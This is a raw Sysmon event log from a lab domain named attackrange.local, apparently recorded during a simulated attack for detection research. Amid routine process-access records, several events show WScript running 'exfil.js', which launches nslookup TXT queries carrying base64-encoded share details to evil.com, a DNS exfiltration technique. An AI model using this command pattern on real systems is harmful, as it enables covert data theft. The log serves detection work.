14:16:12.229{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-653E-000000005F02}7712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195681Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.229{2E1864BB-17AC-629A-633E-000000005F02}75363596C:\Windows\system32\cmd.exe{2E1864BB-17AC-629A-653E-000000005F02}7712C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195680Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.241{2E1864BB-17AC-629A-653E-000000005F02}7712C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AC-629A-633E-000000005F02}7536C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlefvjq.tmp 2>&1 10341000x8000000000000000195679Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.192{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-643E-000000005F02}7024C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195678Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.192{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-643E-000000005F02}7024C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195677Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.176{2E1864BB-17AC-629A-643E-000000005F02}70242568C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-633E-000000005F02}7536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195676Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.161{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-643E-000000005F02}7024C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195675Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.145{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195674Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.145{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195673Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.145{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195672Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.145{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195671Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.145{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-633E-000000005F02}7536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195670Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.145{2E1864BB-17A1-629A-783D-000000005F02}55521716C:\Windows\System32\WScript.exe{2E1864BB-17AC-629A-633E-000000005F02}7536C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195669Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.153{2E1864BB-17AC-629A-633E-000000005F02}7536C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlefvjq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195668Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.145{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlozzb.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195667Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.115{2E1864BB-17AC-629A-613E-000000005F02}26526172C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-623E-000000005F02}3832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195666Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.107{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-623E-000000005F02}3832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195665Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.106{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195664Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.106{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195663Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.091{2E1864BB-17AC-629A-603E-000000005F02}72361636C:\Windows\system32\cmd.exe{2E1864BB-17AC-629A-623E-000000005F02}3832C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195662Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.091{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195661Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.091{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195660Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.105{2E1864BB-17AC-629A-623E-000000005F02}3832C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17AC-629A-603E-000000005F02}7236C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlozzb.tmp 2>&1 23542300x8000000000000000195659Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.076{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA82E5A6B0FE6E3F54468B3435BA27CE,SHA256=74F7E68CA62F190D9F1173A785E7038AF03983272978D6624081CA69F5DE612C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195658Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.059{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-613E-000000005F02}2652C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195657Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.059{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17AC-629A-613E-000000005F02}2652C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195656Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.045{2E1864BB-17AC-629A-613E-000000005F02}26526172C:\Windows\system32\conhost.exe{2E1864BB-17AC-629A-603E-000000005F02}7236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195655Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.028{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-613E-000000005F02}2652C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195654Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.013{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195653Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.013{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195652Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.013{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17AC-629A-603E-000000005F02}7236C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195651Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:12.013{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000043915Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:12.995{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAAA151EC96B5359804C4FA40FE64857,SHA256=3E8853BAE61FDEC8F0AD8894C08049BA1B519C6436169EB2E82515E183A08897,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195650Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 